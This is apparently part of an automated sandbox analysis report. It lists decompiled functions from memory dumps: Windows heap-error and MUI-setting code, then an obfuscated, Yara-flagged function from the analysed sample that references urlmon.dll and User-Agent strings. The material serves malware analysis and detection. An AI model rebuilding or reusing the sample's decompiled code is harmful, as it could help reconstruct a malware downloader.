				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019BB150();
				} else {
					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E019BB150("Error code: %d - %s\n",  *0x1aa5898);
				_t113 =  *0x1aa58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019BB150();
					} else {
						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019BB150("Parameter1: %p\n",  *0x1aa58a4);
				}
				_t115 =  *0x1aa58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019BB150();
					} else {
						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019BB150("Parameter2: %p\n",  *0x1aa58a8);
				}
				_t117 =  *0x1aa58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019BB150();
					} else {
						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E019BB150("Parameter3: %p\n",  *0x1aa58ac);
				}
				_t119 =  *0x1aa58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E019BB150();
					} else {
						E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1aa58b4);
					E019BB150("Last known valid blocks: before - %p, after - %p\n",  *0x1aa58b0);
				} else {
					_t120 =  *0x1aa58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E019BB150();
				} else {
					E019BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E019BB150("Stack trace available at %p\n", 0x1aa58c0);
			}











                                  0x01a71c10
                                  0x01a71c16
                                  0x01a71c1e
                                  0x01a71c3d
                                  0x01a71c3e
                                  0x01a71c20
                                  0x01a71c35
                                  0x01a71c3a
                                  0x01a71c44
                                  0x01a71c55
                                  0x01a71c5a
                                  0x01a71c65
                                  0x01a71c67
                                  0x00000000
                                  0x01a71c6e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a71c67
                                  0x01a71cdc
                                  0x01a71ce5
                                  0x01a71d04
                                  0x01a71d05
                                  0x01a71ce7
                                  0x01a71cfc
                                  0x01a71d01
                                  0x01a71d0b
                                  0x01a71d17
                                  0x01a71d1f
                                  0x01a71d25
                                  0x01a71d30
                                  0x01a71d4f
                                  0x01a71d50
                                  0x01a71d32
                                  0x01a71d47
                                  0x01a71d4c
                                  0x01a71d61
                                  0x01a71d67
                                  0x01a71d68
                                  0x01a71d6e
                                  0x01a71d79
                                  0x01a71d98
                                  0x01a71d99
                                  0x01a71d7b
                                  0x01a71d90
                                  0x01a71d95
                                  0x01a71daa
                                  0x01a71db0
                                  0x01a71db1
                                  0x01a71db7
                                  0x01a71dc2
                                  0x01a71de1
                                  0x01a71de2
                                  0x01a71dc4
                                  0x01a71dd9
                                  0x01a71dde
                                  0x01a71df3
                                  0x01a71df9
                                  0x01a71dfa
                                  0x01a71e00
                                  0x01a71e0a
                                  0x01a71e13
                                  0x01a71e32
                                  0x01a71e33
                                  0x01a71e15
                                  0x01a71e2a
                                  0x01a71e2f
                                  0x01a71e39
                                  0x01a71e4a
                                  0x01a71e02
                                  0x01a71e02
                                  0x01a71e08
                                  0x00000000
                                  0x00000000
                                  0x01a71e08
                                  0x01a71e5b
                                  0x01a71e7a
                                  0x01a71e7b
                                  0x01a71e5d
                                  0x01a71e72
                                  0x01a71e77
                                  0x01a71e95

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  • Opcode ID: 93ddb86ab61ee50e5b48433dbfb5ae4be00c8e6ce630ebd60feadc74d1938e12
                                  • Instruction ID: 32d60d57f8878fa27172e11a06dba1ac093bae226a1a32b3d0214486a2a0fe5a
                                  • Opcode Fuzzy Hash: 93ddb86ab61ee50e5b48433dbfb5ae4be00c8e6ce630ebd60feadc74d1938e12
                                  • Instruction Fuzzy Hash: 4161E136921246DFD722AB89D984E34B3F8FB44920B8D842AF50E5B341D6249D458F9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019C3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E019C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E019C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E019C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E019C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E019C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E019C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L019D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E019FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01A01370(_t276, 0x1994e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E019FBB40(0,  &_v68, _t170);
									if(L019C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E019FBB40(_t257,  &_v68, _t243);
								if(L019C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01A01370(_t278, 0x1994e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L019D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E019FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01A01370(_v16, 0x1994e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E019FBB40(_t262,  &_v68, _t244);
								if(L019C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01A01370(_t282, 0x1994e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E019FBB40(_t262,  &_v68, _t201);
							if(L019C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L019D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E019FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01A01370(_t280, 0x1994e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E019FBB40(_t267,  &_v68, _t245);
							if(L019C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01A01370(_t284, 0x1994e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E019FBB40(_t267,  &_v68, _t224);
						if(L019C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                  0x019c3d3c
                                  0x019c3d42
                                  0x019c3d44
                                  0x019c3d46
                                  0x019c3d49
                                  0x019c3d4c
                                  0x019c3d4f
                                  0x019c3d52
                                  0x019c3d55
                                  0x019c3d58
                                  0x019c3d5b
                                  0x019c3d5f
                                  0x019c3d61
                                  0x019c3d66
                                  0x01a18213
                                  0x01a18218
                                  0x019c4085
                                  0x019c4088
                                  0x019c408e
                                  0x019c4094
                                  0x019c409a
                                  0x019c40a0
                                  0x019c40a6
                                  0x019c40a9
                                  0x019c40af
                                  0x019c40b6
                                  0x019c40bd
                                  0x019c40bd
                                  0x019c3d83
                                  0x01a1821f
                                  0x01a18229
                                  0x01a18238
                                  0x01a18238
                                  0x01a1823d
                                  0x01a1823d
                                  0x019c3da0
                                  0x019c3daf
                                  0x019c3db5
                                  0x019c3dba
                                  0x019c3dba
                                  0x019c3dd4
                                  0x019c3e94
                                  0x019c3eab
                                  0x019c3f6d
                                  0x019c3f84
                                  0x019c406b
                                  0x019c406b
                                  0x019c406e
                                  0x019c406e
                                  0x019c4070
                                  0x019c4074
                                  0x01a18351
                                  0x01a18351
                                  0x019c407a
                                  0x019c407f
                                  0x01a1835d
                                  0x01a18370
                                  0x01a18377
                                  0x01a18379
                                  0x01a1837c
                                  0x01a1837c
                                  0x01a1835d
                                  0x00000000
                                  0x019c407f
                                  0x019c3f8a
                                  0x019c3f8d
                                  0x019c3f90
                                  0x019c3f95
                                  0x01a1830d
                                  0x01a1830f
                                  0x019c3f9b
                                  0x019c3fac
                                  0x019c3fae
                                  0x019c3fb1
                                  0x019c3fb1
                                  0x019c3fb6
                                  0x01a18317
                                  0x01a1831a
                                  0x00000000
                                  0x019c3fbc
                                  0x019c3fc1
                                  0x019c3fc9
                                  0x019c3fd7
                                  0x019c3fda
                                  0x019c3fdd
                                  0x019c4021
                                  0x019c4021
                                  0x019c4029
                                  0x019c4030
                                  0x019c4044
                                  0x019c4046
                                  0x019c4046
                                  0x019c4044
                                  0x019c4049
                                  0x01a18327
                                  0x01a18334
                                  0x01a18339
                                  0x01a1833c
                                  0x019c404f
                                  0x019c404f
                                  0x019c404f
                                  0x019c4051
                                  0x019c4056
                                  0x019c4063
                                  0x019c4063
                                  0x019c4068
                                  0x00000000
                                  0x019c4068
                                  0x019c3fdf
                                  0x019c3fe2
                                  0x019c3fe4
                                  0x019c3fe7
                                  0x019c3fef
                                  0x019c4003
                                  0x019c4005
                                  0x019c4005
                                  0x019c400c
                                  0x019c4013
                                  0x019c4016
                                  0x019c4017
                                  0x019c401b
                                  0x019c401e
                                  0x00000000
                                  0x019c401e
                                  0x019c3fb6
                                  0x019c3eb1
                                  0x019c3eb4
                                  0x019c3eb7
                                  0x019c3ebc
                                  0x01a182a9
                                  0x01a182ab
                                  0x019c3ec2
                                  0x019c3ed3
                                  0x019c3ed5
                                  0x019c3ed8
                                  0x019c3ed8
                                  0x019c3edd
                                  0x01a182b3
                                  0x01a182b6
                                  0x00000000
                                  0x019c3ee3
                                  0x019c3ee8
                                  0x019c3eed
                                  0x019c3ef0
                                  0x019c3ef3
                                  0x019c3f02
                                  0x019c3f05
                                  0x019c3f08
                                  0x01a182c0
                                  0x01a182c3
                                  0x01a182c5
                                  0x01a182c8
                                  0x01a182d0
                                  0x01a182e4
                                  0x01a182e6
                                  0x01a182e6
                                  0x01a182ed
                                  0x01a182f4
                                  0x01a182f7
                                  0x01a182f8
                                  0x01a182fc
                                  0x01a182ff
                                  0x01a182ff
                                  0x019c3f0e
                                  0x019c3f11
                                  0x019c3f16
                                  0x019c3f1d
                                  0x019c3f31
                                  0x01a18307
                                  0x01a18307
                                  0x019c3f31
                                  0x019c3f39
                                  0x019c3f48
                                  0x019c3f4d
                                  0x019c3f50
                                  0x019c3f50
                                  0x019c3f53
                                  0x019c3f58
                                  0x019c3f65
                                  0x019c3f65
                                  0x019c3f6a
                                  0x00000000
                                  0x019c3f6a
                                  0x019c3edd
                                  0x019c3dda
                                  0x019c3ddd
                                  0x019c3de0
                                  0x019c3de5
                                  0x01a18245
                                  0x019c3deb
                                  0x019c3df7
                                  0x019c3dfc
                                  0x019c3dfe
                                  0x019c3e01
                                  0x019c3e01
                                  0x019c3e06
                                  0x01a1824d
                                  0x01a1824f
                                  0x01a18254
                                  0x00000000
                                  0x019c3e0c
                                  0x019c3e11
                                  0x019c3e16
                                  0x019c3e19
                                  0x019c3e29
                                  0x019c3e2c
                                  0x019c3e2f
                                  0x01a1825c
                                  0x01a1825f
                                  0x01a18261
                                  0x01a18264
                                  0x01a1826c
                                  0x01a18280
                                  0x01a18282
                                  0x01a18282
                                  0x01a18289
                                  0x01a18290
                                  0x01a18293
                                  0x01a18294
                                  0x01a18298
                                  0x01a1829b
                                  0x01a1829b
                                  0x019c3e35
                                  0x019c3e38
                                  0x019c3e3d
                                  0x019c3e44
                                  0x019c3e58
                                  0x01a182a3
                                  0x01a182a3
                                  0x019c3e58
                                  0x019c3e60
                                  0x019c3e6f
                                  0x019c3e74
                                  0x019c3e77
                                  0x019c3e77
                                  0x019c3e7a
                                  0x019c3e7f
                                  0x019c3e8c
                                  0x019c3e8c
                                  0x019c3e91
                                  0x00000000
                                  0x019c3e91

                                  Strings
                                  • Kernel-MUI-Language-SKU, xrefs: 019C3F70
                                  • WindowsExcludedProcs, xrefs: 019C3D6F
                                  • Kernel-MUI-Number-Allowed, xrefs: 019C3D8C
                                  • Kernel-MUI-Language-Disallowed, xrefs: 019C3E97
                                  • Kernel-MUI-Language-Allowed, xrefs: 019C3DC0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: c122317fd07f48f1cedd3774359a488c57ab4b5269fa242400735d91e5b1ff2f
                                  • Instruction ID: d84ae6927ebe6eef34e035f7c2e576663b9541f722821cfadc313cafeb52379d
                                  • Opcode Fuzzy Hash: c122317fd07f48f1cedd3774359a488c57ab4b5269fa242400735d91e5b1ff2f
                                  • Instruction Fuzzy Hash: ACF15E72D00219EFCF16DF98C980EEEBBB9FF48A50F15446AE549A7210D7349E01CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004157D8, Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E004157D8(signed int __eax, void* __ecx, signed int __edx, void* __fp0) {
				signed int _t36;
				signed int _t41;
				signed char _t43;
				signed char _t48;
				signed char _t49;
				signed char _t51;
				void* _t55;
				signed char _t60;
				signed int _t61;
				signed int _t66;
				void* _t73;

				_t55 = __ecx;
				if((__edx &  *(_t73 + __ecx + 0x26)) == 0) {
					_t36 = __eax ^ 0x542b733e;
					__eflags = _t36;
					if(__eflags >= 0) {
						_push(_t66);
						__eflags = 0;
						_push(_t60);
						_t61 =  *(_t73 + 0xc);
						 *((intOrPtr*)(_t73 - 0x19)) = 0;
						 *((char*)(_t73 - 0x15)) = 0;
						goto L27;
					} else {
						asm("adc dl, dl");
						goto L22;
					}
				} else {
					asm("les ebp, [ebx]");
					_t17 = __eax;
					__eax = __esp;
					__esp = _t17;
					__eflags = __al - 0xa4;
					__al =  *0xa4cf642b;
					asm("movsb");
					__ah = 0xce;
					__ebx = 0xc7707ee;
					if(__eflags > 0) {
						L27:
						goto L29;
					} else {
						__esp = __esp + 1;
						_push(__ecx);
						__eax = __eax + 1;
						__eflags = __eax;
						asm("a16 add eax, 0xb69a140");
						asm("scasw");
						asm("ficomp word [ebp+0x13]");
						if(__eflags == 0) {
							while(1) {
								L7:
								asm("out 0x73, al");
								while(__eflags > 0) {
									__eflags = __eax & 0x9372fc31;
									_t13 = __eax;
									__eax = __edx;
									__edx = _t13;
									__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
									__eflags = __bh;
									__esp = __esp + 1;
									_push(ds);
									asm("adc [esi], cl");
									_push(__ecx);
									_push(__ecx);
									asm("sti");
									asm("faddp st1, st0");
									if(__eflags > 0) {
										continue;
									} else {
										asm("das");
										if(__eflags < 0) {
											L22:
											asm("ror byte [ebx], cl");
											_t43 = _t60;
											_t61 = _t36;
											_t23 = _t73 + 0x7f6cb721;
											 *_t23 =  *(_t73 + 0x7f6cb721) + _t55;
											__eflags =  *_t23;
											goto L23;
										} else {
											_push(ss);
											__bh = __bh |  *__ecx;
											__eflags = __bh;
											if(__eflags >= 0) {
												goto L18;
											} else {
												asm("scasd");
												 *0x529d6c8a = __eax;
												__al = __al - 0xcc;
												asm("cmpsd");
												__eflags = __esp - __edi;
												if(__eflags >= 0) {
													_push(__ebx);
													_push(__edi);
													__ebx = __ebx + 1;
													__ebx = __ebx - 1;
													asm("enter 0x90ab, 0xfe");
													asm("o16 jge 0x7e");
													__dl = 0xe6;
													__edx = __edx - 1;
													__eflags = __edx;
													_t5 = __edx - 0x618a279f;
													_t6 = __ah;
													__ah =  *_t5;
													 *_t5 = _t6;
												} else {
													 *[cs:ebx+0x72fc0a61] = __dh;
													asm("into");
													asm("pushad");
													_t15 = __eax - 0x6678bb3c;
													_t16 = __dl;
													__dl =  *_t15;
													 *_t15 = _t16;
													_pop(ss);
													asm("enter 0x3aa, 0xa1");
													asm("out dx, eax");
												}
												asm("popad");
												__fp0 = __fp0 /  *(__ebp - 0x62);
												__edx =  *(__esi + __edx * 8) * 0x3b;
												__edx = __edx - 1;
												__edi = 0xf5f30346;
												__esi = __ebx;
												asm("retf");
												_t10 = __eax;
												__eax = __ecx;
												__ecx = _t10;
												asm("int3");
												goto L7;
											}
										}
									}
									goto L33;
								}
								_t3 = __ebp - 0x73;
								 *_t3 =  *(__ebp - 0x73) << 0x56;
								__eflags =  *_t3;
							}
						} else {
							__bh = __bh + __al;
							asm("adc al, 0xb1");
							__dh = 0xa0;
							asm("sbb cl, [esp+ecx*8+0x53]");
							asm("repne mov esp, edi");
							__al = __al ^ 0x0000006d;
							asm("jecxz 0xffffffa7");
							__ebx = 0x9a0bfea9;
							asm("stc");
							__edx = __eax * 0x9a0bfea9 >> 0x20;
							__eflags = __eax;
							L18:
							L23:
							if(__eflags > 0) {
								 *_t43 =  *_t43 & _t43;
								_push(ss);
								 *((intOrPtr*)(_t43 + _t55 - 1)) =  *((intOrPtr*)(_t43 + _t55 - 1)) + _t43 + _t55 - 1;
								_t33 = _t73 - 0x24; // 0x6d6c7275
								__eflags =  *((intOrPtr*)(_t73 + 8)) + 0xc94;
								_t66 = E00413E50( *((intOrPtr*)(_t73 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t73 + 8)) + 0xc94,  *((intOrPtr*)(_t73 + 8)) + 0xc94, _t33), 0, 0, 0x69767207);
								L29:
								asm("lock add esp, 0x28");
								__eflags = _t66;
								if(_t66 == 0) {
									L32:
									__eflags = 0;
									return 0;
								} else {
									_t41 =  *_t66(0, E0041A390(_t61) + _t61, _t73 - 4);
									__eflags = _t41;
									if(_t41 != 0) {
										goto L32;
									} else {
										return 1;
									}
								}
							} else {
								_t48 = _t51;
								__eflags = _t48 & 0x69453e52;
								asm("outsd");
								_t49 = _t48 &  *(_t43 - 0x68);
								__eflags = _t49;
								asm("arpl [eax-0x19cfcce5], di");
								asm("loopne 0x32");
								return _t49;
							}
						}
					}
				}
				L33:
			}














                                  0x004157d8
                                  0x004157dc
                                  0x00415824
                                  0x00415824
                                  0x00415825
                                  0x00415856
                                  0x00415857
                                  0x00415859
                                  0x0041585a
                                  0x0041585d
                                  0x00415860
                                  0x00000000
                                  0x00415828
                                  0x00415829
                                  0x00000000
                                  0x00415829
                                  0x004157de
                                  0x004157de
                                  0x004157e0
                                  0x004157e0
                                  0x004157e0
                                  0x004157e1
                                  0x004157e3
                                  0x004157e8
                                  0x004157e9
                                  0x004157eb
                                  0x004157f0
                                  0x00415862
                                  0x00000000
                                  0x004157f2
                                  0x004157f2
                                  0x004157f3
                                  0x004157f5
                                  0x004157f5
                                  0x004157f6
                                  0x004157fc
                                  0x004157fe
                                  0x00415801
                                  0x0041578a
                                  0x0041578a
                                  0x0041578a
                                  0x0041578c
                                  0x0041578e
                                  0x00415793
                                  0x00415793
                                  0x00415793
                                  0x00415794
                                  0x00415794
                                  0x0041579a
                                  0x0041579b
                                  0x0041579c
                                  0x0041579e
                                  0x0041579f
                                  0x004157a0
                                  0x004157a1
                                  0x004157a3
                                  0x00000000
                                  0x004157a5
                                  0x004157aa
                                  0x004157ab
                                  0x0041582a
                                  0x0041582a
                                  0x0041582d
                                  0x0041582d
                                  0x0041582e
                                  0x0041582e
                                  0x0041582e
                                  0x00000000
                                  0x004157ad
                                  0x004157ad
                                  0x004157ae
                                  0x004157ae
                                  0x004157b0
                                  0x00000000
                                  0x004157b2
                                  0x004157b2
                                  0x004157b3
                                  0x004157b8
                                  0x004157ba
                                  0x004157bb
                                  0x004157bd
                                  0x00415763
                                  0x00415764
                                  0x00415765
                                  0x00415769
                                  0x0041576a
                                  0x0041576e
                                  0x00415771
                                  0x00415773
                                  0x00415773
                                  0x00415774
                                  0x00415774
                                  0x00415774
                                  0x00415774
                                  0x004157bf
                                  0x004157bf
                                  0x004157c6
                                  0x004157c7
                                  0x004157c8
                                  0x004157c8
                                  0x004157c8
                                  0x004157c8
                                  0x004157cf
                                  0x004157d0
                                  0x004157d4
                                  0x004157d4
                                  0x00415776
                                  0x00415777
                                  0x0041577a
                                  0x0041577f
                                  0x00415780
                                  0x00415785
                                  0x00415787
                                  0x00415788
                                  0x00415788
                                  0x00415788
                                  0x00415789
                                  0x00000000
                                  0x00415789
                                  0x004157b0
                                  0x004157ab
                                  0x00000000
                                  0x004157a3
                                  0x00415737
                                  0x00415737
                                  0x00415737
                                  0x00415737
                                  0x00415803
                                  0x00415803
                                  0x00415805
                                  0x00415807
                                  0x00415809
                                  0x0041580d
                                  0x00415810
                                  0x00415813
                                  0x00415815
                                  0x0041581a
                                  0x0041581b
                                  0x0041581b
                                  0x0041581c
                                  0x00415833
                                  0x00415833
                                  0x004158a2
                                  0x004158a6
                                  0x004158a8
                                  0x004158ad
                                  0x004158b1
                                  0x004158cd
                                  0x004158ce
                                  0x004158ce
                                  0x004158d2
                                  0x004158d4
                                  0x004158f9
                                  0x004158fa
                                  0x00415900
                                  0x004158d6
                                  0x004158e8
                                  0x004158ea
                                  0x004158ec
                                  0x00000000
                                  0x004158ee
                                  0x004158f8
                                  0x004158f8
                                  0x004158ec
                                  0x00415835
                                  0x00415835
                                  0x00415836
                                  0x0041583b
                                  0x0041583c
                                  0x0041583c
                                  0x0041583f
                                  0x00415845
                                  0x0041584f
                                  0x0041584f
                                  0x00415833
                                  0x00415801
                                  0x004157f0
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                                  • Instruction ID: d35fe0e56d5b213ec2a307e6804696366d35cc18aa5b3103ee1b1b76edd744e7
                                  • Opcode Fuzzy Hash: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                                  • Instruction Fuzzy Hash: 0741BC72805644EEDB01DE519D427EFBFB8EB85724F18001AEC00AB341D33D899687DA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004157AA, Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
